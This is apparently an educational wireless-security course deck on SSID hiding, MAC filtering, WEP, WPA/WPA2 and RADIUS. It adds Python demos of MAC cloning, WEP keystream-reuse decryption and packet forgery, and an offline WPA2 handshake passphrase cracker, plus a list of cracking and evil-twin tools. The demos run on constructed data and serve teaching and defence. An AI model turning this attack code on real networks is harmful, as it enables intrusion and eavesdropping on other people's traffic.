Wireless Security Part 2. Contents: wireless security issues; the security features available on access points; encryption and authentication with WEP, WPA and WPA2 (802.11i); 802.1X authentication; hotspots and their security.
Wireless Security Part 2
Contents
• Wireless security issues
• Explore the various security features available on access points
• Look at encryption and authentication with WEP, WPA and WPA2 (802.11i)
• Look at 802.1X authentication
• Discuss hotspots and their security
• Share the wireless security needs and issues of your schools
Headlines
• Teens charged with breaking into school computer (Jan 2009): Jonathan To, 18, and another teen were charged with computer theft after a routine audit discovered a discrepancy between grade reports and school transcripts.
• Kid hacks school computer on teacher's dare (Jan 2001): Fifteen-year-old Washington State high school student Aaron Lutes defeated the filtering/security software on a school computer system after his teacher dared the class to try it.
• US school cheat hack suspect faces 38 years jail (June 2008): Tanvir Singh, 18, allegedly conspired with Khan in an abortive attempt to break into the school and steal a test. The pair were caught by a school caretaker while trying to log onto a teacher's computer.
• Hong Kong student hacks prizes in McDonald's contest (Nov 2008): A Hong Kong student was convicted of hacking into McDonald's website to claim all the prizes in an online competition.
Wireless Weaknesses and Hazards
Access point weaknesses
• Physically insecure installation location
• Omni-directional antenna that sends signals in every direction
• Signal power level set too high, letting radio signals leak outside the building
• MAC address controls that are easily circumvented
• WEP, WPA or WPA2 not being used, or not being used properly
• Management interfaces that are publicly accessible, often with weak or no administrator password protection
Wireless client weaknesses
• Windows systems not protected by a personal firewall that share drives, provide various types of remote connectivity and are missing critical software patches
• Dual-homed systems connected to both the wired and wireless networks at the same time
• Wireless clients with ad-hoc mode enabled
• Printers installed on the wired network with wireless connectivity left enabled
Security Needs
• Ensure no unauthorised access
• Protect the network from illegitimate clients connecting to it and using your resources
• Prevent a "man in the middle" placed on your network from capturing your network traffic
• Several techniques are available: SSID, MAC address filtering, authentication with a passphrase, digital certificates, a RADIUS server
SSID (Service Set Identifier)
• The name given to identify a wireless network
• All devices must use the same name to communicate
• Can be up to 32 bytes long
• Broadcast by the access point in beacon frames at a fixed interval; a client also probes for the SSID when joining the network
• Disabling SSID broadcasting gives an "invisible network": the beacon then carries an empty SSID, but the SSID still travels in clear text in probe requests, probe responses and association requests, so a sniffer recovers it as soon as any client connects (Kismet, listed under tools below, does exactly this). Hiding the SSID is obscurity, not access control.
Workshop: SSID security
• AP: set up an SSID (ITEDxx, where xx = 01 to 08) and tell your team members the full SSID name
• Client: use Windows "Wireless Zero Configuration" to connect to the wireless network via "available wireless networks"
• Repeat the above but hide (disable broadcasting of) the SSID
• Can clients still connect, and is your network protected?
MAC Address Filter
• A MAC (Media Access Control) address, also called the physical address, is 48 bits written as 12 hex digits, for example 02-00-54-55-4E-01
• A MAC address filter on the AP controls which clients may join the wireless network
• The administrator enters the list of permitted MAC addresses into the AP
• Caveat: every frame carries the sender's MAC address unencrypted, so an attacker sniffing the network learns the permitted addresses and can set their own card to one of them; the filter cannot tell the clone from the real client
Workshop: MAC address filtering
• Group members determine the MAC address of their wireless network card
• AP: the administrator enters the list of MACs into the AP and sets the AP security to "Open"
• Client: use Windows "Wireless Zero Configuration" to connect to your wireless network
• AP: disable MAC address filtering
• Client: repeat step 3
• Were you able to connect successfully in each case?
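To make the SSID and MAC-filtering workshops concrete, here is an added example (not from the slides, and not any vendor's code) of what a passive sniffer learns from a "hidden" SSID network protected by a MAC filter. The frames are hand-constructed to the 802.11 management and data header layout rather than captured; the AP and attacker addresses and the SSID ITED01 are invented, and the only address taken from the slides is the example MAC 02-00-54-55-4E-01. The beacon carries an empty SSID, yet the station's own probe request and the AP's probe response leak it, and the data frame leaks a permitted client MAC that the attacker can clone to pass the filter.

```python
"""Passive observer for 802.11 frames: what a sniffer learns from a hidden-SSID
network with MAC filtering. All frames below are constructed by hand (not
captures) following the 802.11 management/data header layout."""

TYPE_MGMT, TYPE_DATA = 0, 2
SUB_PROBE_REQ, SUB_PROBE_RESP, SUB_BEACON = 4, 5, 8
HDR_LEN = 24                       # FC(2) Duration(2) Addr1/2/3(18) SeqCtl(2)
FIXED_LEN = {SUB_BEACON: 12, SUB_PROBE_RESP: 12, SUB_PROBE_REQ: 0}
EID_SSID = 0

def mac(s):
    return bytes.fromhex(s.replace('-', '').replace(':', ''))

def mac_str(b):
    return '-'.join(f'{x:02X}' for x in b)

def element(eid, data):
    """Tagged parameter: element ID, length, value."""
    return bytes([eid, len(data)]) + data

def mgmt_frame(subtype, dst, src, bssid, elements):
    """Management frame: header, fixed fields (zeroed here), tagged elements."""
    fc = bytes([subtype << 4 | TYPE_MGMT << 2, 0])
    hdr = fc + b'\x00\x00' + dst + src + bssid + b'\x00\x00'
    return hdr + bytes(FIXED_LEN[subtype]) + elements

def data_frame(client, bssid, payload):
    """Client-to-AP data frame (ToDS=1): Addr1 = BSSID, Addr2 = station MAC."""
    fc = bytes([TYPE_DATA << 2, 0x01])
    return fc + b'\x00\x00' + bssid + client + bssid + b'\x00\x00' + payload

def parse_elements(body):
    out, i = {}, 0
    while i + 2 <= len(body):
        eid, n = body[i], body[i + 1]
        out[eid] = body[i + 2:i + 2 + n]
        i += 2 + n
    return out

def observe(frames):
    """Return what is recoverable from the air: SSID, BSSID and client MACs."""
    seen = {'ssid': None, 'bssid': None, 'clients': set()}
    for f in frames:
        ftype, subtype = (f[0] >> 2) & 0x3, f[0] >> 4
        to_ds = f[1] & 0x1
        a1, a2, a3 = f[4:10], f[10:16], f[16:22]
        if ftype == TYPE_MGMT and subtype in FIXED_LEN:
            els = parse_elements(f[HDR_LEN + FIXED_LEN[subtype]:])
            ssid = els.get(EID_SSID, b'')
            if ssid:                       # a hidden beacon has a 0-length SSID
                seen['ssid'] = ssid.decode()
            if subtype != SUB_PROBE_REQ:
                seen['bssid'] = a3
        elif ftype == TYPE_DATA and to_ds:
            seen['clients'].add(a2)        # Addr2 is the station's own MAC
            seen['bssid'] = a1
    return seen

def mac_filter_allows(allowed, sender):
    """The AP's entire MAC-filter check: is the unauthenticated source address listed?"""
    return sender in allowed

AP = mac('00-11-22-33-44-55')              # invented
GOOD_CLIENT = mac('02-00-54-55-4E-01')     # the slide's example MAC
ATTACKER = mac('DE-AD-BE-EF-00-01')        # invented
BROADCAST = b'\xff' * 6
SSID = b'ITED01'
RATES = element(1, b'\x82\x84\x8b\x96')    # Supported Rates element

CAPTURE = [  # constructed sample of what an attacker could sniff
    mgmt_frame(SUB_BEACON, BROADCAST, AP, AP, element(EID_SSID, b'') + RATES),   # hidden
    mgmt_frame(SUB_PROBE_REQ, BROADCAST, GOOD_CLIENT, BROADCAST, element(EID_SSID, SSID)),
    mgmt_frame(SUB_PROBE_RESP, GOOD_CLIENT, AP, AP, element(EID_SSID, SSID) + RATES),
    data_frame(GOOD_CLIENT, AP, b'\xaa\xaa\x03'),
]

def demo(allowed=frozenset([GOOD_CLIENT])):
    seen = observe(CAPTURE)
    cloned = next(iter(seen['clients']))   # attacker sets its card to a seen MAC
    return {
        'ssid': seen['ssid'],
        'attacker_real_allowed': mac_filter_allows(allowed, ATTACKER),
        'attacker_cloned_allowed': mac_filter_allows(allowed, cloned),
        'cloned_mac': mac_str(cloned),
    }

if __name__ == '__main__':
    print(demo())
```

The beacon alone yields no SSID, which is all that "disable SSID broadcast" achieves; the first probe exchange gives it away. The MAC filter check is a set lookup on a field the sender chooses, so cloning a permitted address defeats it with no cryptography involved.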
Two Security Features
• Encryption
  • Prevents the content from being read by unauthorised people
  • Network traffic is transformed into a form that only the other party can understand
• Authentication and authorisation
  • Two uses
  • Confirms that the device or person accessing the network is who they claim to be
  • Verifies that the information comes from a trusted source
Encryption Standards
Wireless technology transmits information through open space, so security features have been designed into the relevant protocols. Security considerations: message protection, and access authentication/authorisation.
• WEP: Wired Equivalent Privacy
• WPA: Wi-Fi Protected Access
• WPA2: the Wi-Fi Alliance certification that implements IEEE 802.11i
Wireless LAN Authentication
• Two basic pieces of information
  • SSID (aka network name or network ID)
  • "Password", shared key or "passphrase"
• WEP
• WPA
• 802.11i (WPA2)
• Digital certificates, with a RADIUS server and a CA (certificate authority) at the back end
Infrastructure Mode
• An access point is required
• Select the INFRASTRUCTURE setting on the client
• The SSID configured on the client must match the SSID of the access point; this is the first gate that keeps unintended clients off the network, but no more than that
WEP Encryption Key
• Wired Equivalent Privacy security
• WEP encryption is available on all 802.11a/b/g/n equipment
• The standard required only a 40-bit key (a "64-bit" key once the 24-bit IV is counted), but almost all vendors provide 104-bit ("128-bit") keys and some offer a proprietary 256-bit mode
• WEP uses the RC4 stream cipher to encrypt each packet as it is sent out
Example: 64-bit key
Each per-packet key consists of two parts:
• The pre-shared key, supplied by the user (40 bits)
• An Initialisation Vector (IV), generated by the system for each packet (24 bits)
Pre-shared key = A7z9b = 41 37 7A 39 62 (hex)
IV = 810 = 38 31 30 (hex)
Per-packet RC4 key = IV + pre-shared key = 810A7z9b = 383130 41377A3962
The IV is transmitted in clear text at the front of every frame so that the receiver can rebuild the same RC4 key. With only 24 bits there are about 16.7 million IVs, so on a busy network IVs repeat and the same keystream is reused; that, together with RC4 weak keys, is why WEP keys can be recovered with tools such as Aircrack (see the tools slide).
Workshop: WEP security
• AP: the administrator formulates a 5-character pre-shared key and enters it in Key 1; set security = "Static WEP", shared key
• Inform all team members of the SSID and pre-shared key
• Client: connect with the given SSID and WEP pre-shared key
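As an added example (not from the slides), the following code implements WEP exactly as the key example describes it, with the RC4 seed being the 24-bit IV followed by the secret key and a CRC-32 ICV appended to each packet, using the slide's key A7z9b and IV 810. It then shows two consequences of that design that the workshop does not: reusing an IV lets an attacker who knows one packet's plaintext decrypt any other packet sent under the same IV, and because CRC-32 is linear a ciphertext can be altered without the key and still pass the integrity check. The packet contents are invented.

```python
"""WEP as specified: per-packet RC4 seed = IV || secret key, CRC-32 ICV.
Added example; the key and IV are the slide's, the packets are constructed."""
import zlib

def rc4(key, n):
    """Plain RC4 keystream of n bytes (KSA + PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xff
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xff
        j = (j + S[i]) & 0xff
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xff])
    return bytes(out)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data):
    """WEP integrity check value: plain CRC-32, little-endian."""
    return zlib.crc32(data).to_bytes(4, 'little')

def wep_encrypt(key, iv, plaintext):
    """Return IV (sent in clear) || RC4_{IV||key}(plaintext || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))

def wep_decrypt(key, frame):
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + key, len(ct)))
    pt, tag = body[:-4], body[-4:]
    if tag != icv(pt):
        raise ValueError('ICV check failed')
    return pt

KEY = b'A7z9b'      # the slide's 40-bit key, 41377A3962
IV = b'810'         # the slide's 24-bit IV, 383130

def keystream_reuse(known_plain, frame_known, frame_target):
    """Attacker knows the plaintext of one frame; same IV => same keystream,
    so the second frame is recovered by XOR alone, without the key."""
    assert frame_known[:3] == frame_target[:3], 'demo needs a repeated IV'
    ks = xor(frame_known[3:], known_plain + icv(known_plain))
    return xor(frame_target[3:], ks)[:-4]        # drop the decrypted ICV

def bit_flip(frame, delta):
    """Change the plaintext by `delta` without the key: CRC-32 is affine, so
    crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros), and the ICV can be patched."""
    fix = (zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))).to_bytes(4, 'little')
    return frame[:3] + xor(frame[3:], delta + fix)

def demo():
    p1 = b'GET /grades HTTP/1.0'           # constructed, assumed known to attacker
    p2 = b'PASS hunter2-secret!'           # constructed, sent later under the same IV
    f1 = wep_encrypt(KEY, IV, p1)
    f2 = wep_encrypt(KEY, IV, p2)          # only 2^24 IVs exist, so repeats happen
    recovered = keystream_reuse(p1, f1, f2)
    delta = xor(b'GET /grades', b'PUT /grades') + bytes(len(p1) - 11)
    forged = bit_flip(f1, delta)           # AP accepts this: ICV still verifies
    return recovered, wep_decrypt(KEY, forged)

if __name__ == '__main__':
    print(demo())
```

Neither attack needs the key at all; both follow from a stream cipher with a reused keystream and an unkeyed linear checksum. TKIP's per-packet key mixing, 48-bit sequence counter and keyed MIC (next slides) address exactly these three points.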
What is WPA?
There are MAJOR weaknesses in WEP: its encryption can be broken very easily.
• The Wi-Fi Alliance looked for an alternative together with the IEEE
• An interim security standard to replace WEP
• A subset of the technology taken from the IEEE 802.11i draft
• Designed to secure all versions of 802.11, including a/b/g/n
• The new Temporal Key Integrity Protocol (TKIP) is used for encryption
• WPA-Enterprise employs 802.1X authentication with one of the standard EAP (Extensible Authentication Protocol) methods: digital certificate, user name and password, or smart card; WPA-Personal uses a pre-shared passphrase instead
TKIP (Temporal Key Integrity Protocol)
• An improvement to WEP that still runs on RC4 hardware
• Longer encryption key: 128 bits
• A key mixing function produces a fresh RC4 key for EVERY packet, so the WEP weak-key attacks no longer apply
• Each packet transmitted is assigned a 48-bit sequence number that increases with every new packet; packets received out of order are dropped, which stops a fake AP replaying captured traffic (a "replay attack")
• A new base key for each wireless client associated with the AP
• A keyed message integrity check (Michael) replaces WEP's unkeyed CRC-32
WEP vs WPA
• Cipher: RC4 in both
• Key length: 40 or 104 bits (WEP) vs 128 bits (WPA/TKIP)
• Per-packet key: 24-bit IV prepended to one static key (WEP) vs key mixing function driven by a 48-bit sequence counter (TKIP)
• Integrity: unkeyed CRC-32 ICV (WEP) vs keyed Michael MIC (TKIP)
• Replay protection: none (WEP) vs sequence counter (TKIP)
• Key per client: one key shared by everyone (WEP) vs a base key per associated client (WPA)
How Does It Work? (in SOHO: WPA/WPA2-Personal)
Step 1: Enter matching passphrases into the AP and the client.
Step 2: The AP checks that the client holds the same passphrase by way of the 4-way handshake. If it matches, the client joins the network; if not, the client is kept off the network.
Step 3: Keys are derived from the passphrase and the SSID and installed; the client and AP then exchange encrypted data.
Caveat: anyone who records the handshake can test passphrase guesses offline at their leisure, so the passphrase must be long and not a dictionary word.
Workshop: WPA setup with passphrase security
• AP: formulate a passphrase (pre-shared key) of 8 to 63 characters
• Inform all members of the passphrase and SSID
• Client: connect with the given SSID and WPA pre-shared key
• Were you able to connect successfully?
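The following added example (not from the slides, and not any vendor's code) carries the SOHO steps above through in code: the pre-shared key is derived from the passphrase and SSID with PBKDF2-HMAC-SHA1, the pairwise keys are expanded from it with the 802.11i PRF using both MAC addresses and both handshake nonces, and the station proves possession of the key with a MIC over its handshake message. The same functions then show the attack the workshop passphrase invites: a recorded handshake checked against a word list offline. The MAC addresses, nonces, SSID, passphrase, word list and the EAPOL frame stand-in are all constructed; the MIC is computed the WPA2 way (HMAC-SHA1 truncated to 16 bytes).

```python
"""WPA/WPA2-Personal key derivation and the offline dictionary attack that a
captured 4-way handshake permits. Added example; every input is constructed."""
import hashlib, hmac, os

def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac('sha1', passphrase.encode(), ssid.encode(), 4096, 32)

def prf512(pmk, aa, spa, anonce, snonce):
    """IEEE 802.11i PRF-512 with the 'Pairwise key expansion' label: the PTK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b''
    for i in range(4):
        out += hmac.new(pmk, b'Pairwise key expansion\x00' + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]                 # KCK = [0:16], KEK = [16:32], TK = [32:48]

def eapol_mic(kck, eapol_with_zeroed_mic):
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, EAPOL frame)[:16]."""
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]

AP_MAC = bytes.fromhex('001122334455')        # invented
STA_MAC = bytes.fromhex('020054554e01')       # the slide's example MAC
SSID = 'ITED01'
TRUE_PASSPHRASE = 'wireless-workshop-08'      # invented

def capture_handshake(passphrase, anonce=None, snonce=None):
    """What a sniffer records from message 2: both nonces (message 1 carried the
    AP's) and the station's MIC over its EAPOL-Key frame."""
    anonce = anonce or os.urandom(32)
    snonce = snonce or os.urandom(32)
    ptk = prf512(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, anonce, snonce)
    # Constructed stand-in for an EAPOL-Key frame with its 16-byte MIC field zeroed
    eapol = b'\x01\x03\x00\x75\x02\x01\x0a\x00' + snonce + bytes(16)
    return {'anonce': anonce, 'snonce': snonce, 'eapol': eapol,
            'mic': eapol_mic(ptk[:16], eapol)}

def crack(handshake, wordlist):
    """Offline: each guess costs 4096 SHA-1 rounds and no packets to the AP."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, SSID)
        ptk = prf512(pmk, AP_MAC, STA_MAC, handshake['anonce'], handshake['snonce'])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake['eapol']), handshake['mic']):
            return candidate
    return None

WORDLIST = ['password', 'ITED01', 'wireless', 'wireless-workshop-08', 'letmein']  # constructed

def demo():
    return crack(capture_handshake(TRUE_PASSPHRASE), WORDLIST)

if __name__ == '__main__':
    print('recovered passphrase:', demo())
```

Because the SSID salts the PBKDF2 step, a default SSID lets an attacker precompute PMKs for common passphrases; an unusual SSID plus a long random passphrase is what makes the offline search infeasible. The verifier checks the PBKDF2 step against the 802.11i test vector (passphrase "password", SSID "IEEE").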
IEEE 802.11i (WPA2)
• 802.11i is the official IEEE standard supplying strong security for wireless links
• 802.11i keeps TKIP, as used in WPA, for older hardware
• It adds AES (Advanced Encryption Standard) in CCMP mode; AES is a 128-bit block cipher with 128, 192 or 256-bit keys, and CCMP uses a 128-bit key
• Authentication uses 802.1X for port-based access control (EAP-TLS, PEAP, LEAP)
• RADIUS provides Authentication, Authorisation and Accounting, with default UDP port 1812 for authentication and 1813 for accounting
Authentication Comparison
• EAP-MD5 (Message-Digest Algorithm 5): one-way authentication of the client by MD5 challenge; the server is not authenticated and no keying material is produced, so it cannot deliver per-session WEP/WPA keys and is open to offline dictionary attack
• EAP-TLS (Transport Layer Security): digital certificates used for both client and server authentication; the TLS handshake, including the client certificate, is exchanged in the open
• EAP-TTLS (Tunneled Transport Layer Security): a digital certificate is used only for server-side authentication; the client's user ID and password are sent inside the TLS tunnel
• PEAP (Protected EAP): a digital certificate is used on the server side; an inner EAP method runs inside the tunnel, typically EAP-MSCHAPv2
• LEAP (Lightweight Extensible Authentication Protocol): Cisco's proprietary 802.1X method, based on MS-CHAP user name and password; known to be vulnerable to offline dictionary attack and should not be used
How Does It Work? (in Enterprise)
Step 1: The client presents its credentials (certificate, or user name and password) to the AP using EAP over 802.1X; the AP's controlled port blocks all other traffic.
Step 2: The AP passes the EAP exchange over the wired network to the RADIUS server instead of performing the authentication itself.
Step 3: The server checks the credentials against its records and grants or denies access accordingly ("ID OK" or reject). On success the server hands the AP the master key for that client, from which per-station pairwise keys are derived, and a group key is issued to ALL stations so that they can encrypt and decrypt broadcast and multicast data.
RADIUS = Remote Authentication Dial In User Service
RADIUS Workshop Network Plan
Step 1: The station is challenged to enter a user ID and password.
Step 2: The AP passes the authentication to the RADIUS server (10.10.13.168) over the wired network.
Step 3: The server answers "ID OK" or rejects. The RADIUS server is a Windows 2003 Server that is a member of a domain running directory services.
Workshop: RADIUS authentication
• AP: set it to use the RADIUS server at IP 10.10.13.168 for authentication
• Set WEP as the encryption protocol (the per-session WEP keys are delivered through 802.1X rather than typed in)
• RADIUS: set the shared secret that the AP uses when it talks to the server
• Client: configure a wireless connection to use the trainer's AP
• When connecting, the AP will challenge the user for a user ID and password (user ID and password = userxx, where xx = 01 to 30)
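The AP-to-server leg of the workshop is protected only by the RADIUS shared secret configured in step 3. As an added example (not from the slides, and not any vendor's code), the following builds the Access-Request an AP sends when it relays the client's EAP identity, and implements the two checks the secret provides under RFC 2865 and RFC 2869/3579: the Message-Authenticator (HMAC-MD5 over the request) that the server verifies, and the Response Authenticator (MD5 over the reply, the request authenticator and the secret) that the AP verifies before trusting an Access-Accept. The secret, NAS address, identity and EAP payload are constructed; a real AP carries the whole EAP conversation in EAP-Message attributes, of which only the first (Response/Identity) is shown.

```python
"""RADIUS Access-Request from an AP to its server and the shared-secret checks on
both sides. Added example; secret, addresses and identity are constructed."""
import hashlib, hmac, os, struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, NAS_IP_ADDRESS, EAP_MESSAGE, MESSAGE_AUTHENTICATOR = 1, 4, 79, 80

def attr(t, value):
    """Attribute TLV: type, total length (including these 2 bytes), value."""
    return bytes([t, len(value) + 2]) + value

def packet(code, ident, authenticator, attrs):
    return struct.pack('!BBH', code, ident, 20 + len(attrs)) + authenticator + attrs

def parse_attrs(data):
    out, i = [], 0
    while i < len(data):
        t, n = data[i], data[i + 1]
        out.append((t, data[i + 2:i + n]))
        i += n
    return out

def build_access_request(secret, ident, identity, eap, nas_ip, req_auth=None):
    """AP side: random Request Authenticator, then HMAC-MD5 over the packet with
    the Message-Authenticator value zeroed (RFC 2869 s5.14, mandatory for EAP)."""
    req_auth = req_auth or os.urandom(16)
    head = attr(USER_NAME, identity) + attr(NAS_IP_ADDRESS, nas_ip) + attr(EAP_MESSAGE, eap)
    unsigned = packet(ACCESS_REQUEST, ident, req_auth, head + attr(MESSAGE_AUTHENTICATOR, bytes(16)))
    mac = hmac.new(secret, unsigned, hashlib.md5).digest()
    return unsigned[:-16] + mac                 # MA is the last attribute

def verify_access_request(secret, pkt):
    """Server side: recompute the HMAC with the MA value zeroed; reject if absent."""
    i = 20
    for t, v in parse_attrs(pkt[20:]):
        n = len(v) + 2
        if t == MESSAGE_AUTHENTICATOR:
            zeroed = pkt[:i + 2] + bytes(16) + pkt[i + n:]
            return hmac.compare_digest(hmac.new(secret, zeroed, hashlib.md5).digest(), v)
        i += n
    return False

def build_response(secret, code, request, attrs=b''):
    """Server side: Response Authenticator = MD5(Code+ID+Length+RequestAuth+Attrs+Secret)."""
    ident, req_auth = request[1], request[4:20]
    head = struct.pack('!BBH', code, ident, 20 + len(attrs))
    return head + hashlib.md5(head + req_auth + attrs + secret).digest() + attrs

def verify_response(secret, request, response):
    """AP side: the reply must match our ID and be bound to our request by the secret."""
    if response[1] != request[1]:
        return False
    expected = hashlib.md5(response[:4] + request[4:20] + response[20:] + secret).digest()
    return hmac.compare_digest(expected, response[4:20])

SECRET = b'ap-shared-secret'                    # constructed
NAS_IP = bytes([10, 10, 13, 1])                 # constructed AP address
EAP_IDENTITY = b'\x02\x01\x00\x0b\x01user01'    # EAP Response/Identity, id 1, "user01"

def demo():
    req = build_access_request(SECRET, 7, b'user01', EAP_IDENTITY, NAS_IP)
    accept = build_response(SECRET, ACCESS_ACCEPT, req)
    forged = build_response(b'wrong-secret', ACCESS_ACCEPT, req)   # rogue "server"
    return {
        'server_accepts_request': verify_access_request(SECRET, req),
        'server_rejects_bad_secret': verify_access_request(b'wrong-secret', req),
        'ap_trusts_reply': verify_response(SECRET, req, accept),
        'ap_trusts_forged_reply': verify_response(SECRET, req, forged),
    }

if __name__ == '__main__':
    print(demo())
```

Everything here rides on MD5 keyed with one static secret over plain UDP, and anyone who captures a request/response pair can attack a short secret offline. For the workshop a throwaway value is fine; in production the secret should be long and random, each AP should have its own, and the AP-to-server path should be on a separate wired VLAN or carried over RADIUS/TLS.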
Security Summary (weakest to strongest)
• Open network, with or without a hidden SSID
• MAC address filtering
• WEP
• WPA with a passphrase (TKIP)
• WPA2 / 802.11i with a passphrase (AES-CCMP)
• WPA2 with 802.1X, a RADIUS server and digital certificates
Other Wireless Security Measures
• VPN (Virtual Private Network)
  • Creates a virtual connection using IPsec or another VPN protocol so that the transmitted data is encrypted end to end, whatever the wireless link itself provides
  • Needs a VPN server
• VLAN (Virtual LAN) with multiple SSIDs
  • Separates groups of users so that each can reach only its own resources on the network
  • Needs a VLAN-capable switch and AP
Security Experience Sharing
What wireless network is implemented at your school, and what security issues can you foresee?
Wireless Testing Tools
Free tools
• NetStumbler quickly identifies basic wireless devices that will respond to an "anybody out there?" request.
• Kismet roots out wireless devices that have their SSIDs hidden or otherwise won't respond to basic NetStumbler probes. If you're not into Linux or don't want to spend hours or days setting up your wireless card drivers in Linux, you can run Kismet directly from the BackTrack Live CD.
• Aircrack is for WEP and WPA pre-shared key cracking.
• FakeAP on the BackTrack Live CD mimics a legitimate access point and sets up an "evil twin" attack, to see how carelessly your users connect to any old access point.
• Wireshark: packet capture and protocol analysis tool.
Commercial tools
• AiroPeek wireless network analyzer, to quickly and easily capture packets, look for top talkers, discover rogue systems and more.
• AirMagnet Laptop Analyzer, among many other things, has a nifty signal strength meter for determining how close or far away a wireless device is when you're walking around trying to locate it.
• CommView for WiFi is for low-cost packet capturing, packet generation and more.
• WFilter, an Internet monitoring tool for web and IM traffic.
Public WiFi and Hotspots
• Hong Kong, "a Wireless City": the HK Government has a vision of city-wide wireless access
• Current players
  • HK Government, with about 3000 APs
  • Commercial operators, with about 5000 APs
  • FON, ??
  • Free WiFi in shopping malls, restaurants, cafés, etc.
• Explore the security controls offered by public WiFi operators
Search for Registered WiFi APs
• Public APs are registered with OFTA
• You can find out where WiFi APs are available at: https://apps.ofta.gov.hk/apps/clr/content/public_search.asp
• Recommendations for using public WiFi: http://www.infosec.gov.hk/english/yourself/wireless_3.html
Captive Portal: PCCW and the Airport
• Example: https://hotspot.netvigator.com/airport/login2.html
• A commercial web-based application that authenticates the user
• Once logged in, the user is allowed onto the WiFi network
• Found in hotels, airports, shopping malls, etc.
• Caveat: the portal authenticates the user to the operator, but the radio link itself is usually open and unencrypted, so other people nearby can read the traffic; use a VPN over public WiFi, as the recommendations above advise
Course Summary
• Looked at wireless LAN standards: IEEE 802.11a/b/g/n
• Learned how to set up
  • Ad-hoc
  • Enterprise
• Looked at the various types of standard wireless security
  • SSID, MAC address filtering
  • Encryption: WEP, WPA, WPA2
  • Authentication: 802.1X, RADIUS
• Evaluated the advantages and disadvantages